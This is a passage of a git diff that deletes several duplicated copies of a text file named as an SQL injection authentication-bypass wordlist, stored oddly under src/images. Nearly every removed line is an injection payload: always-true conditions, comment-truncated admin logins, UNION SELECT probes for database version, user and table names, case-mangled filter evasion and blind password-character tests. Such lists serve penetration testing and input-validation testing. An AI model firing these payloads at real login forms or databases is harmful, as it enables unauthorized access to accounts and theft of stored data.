-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
